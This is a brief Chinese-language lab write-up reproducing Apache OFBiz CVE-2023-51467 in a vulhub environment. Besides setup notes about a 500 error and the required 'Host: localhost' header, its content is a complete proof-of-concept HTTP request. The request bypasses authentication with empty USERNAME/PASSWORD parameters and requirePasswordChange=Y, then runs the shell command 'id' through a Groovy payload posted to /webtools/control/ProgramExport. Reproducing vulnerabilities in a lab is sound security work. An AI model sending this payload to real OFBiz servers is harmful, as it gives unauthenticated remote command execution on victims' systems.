Apache OFBiz - CVE-2023-51467

  • 复现环境 vulhub

image.png

注意

  • 服务500报错

image-qwro.png

  • 根据配置文件 security.properties
  • headers 需要包含 Host: localhost,否则报错

image-cycy.png

image-olsd.png

  • 修改一下请求,正常访问

image-daft.png

利用

poc:

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost
Cookie: OFBiz.Visitor=10001
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://192.168.72.139:8443/accounting/control/main
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);
YAML

image-fjgx.png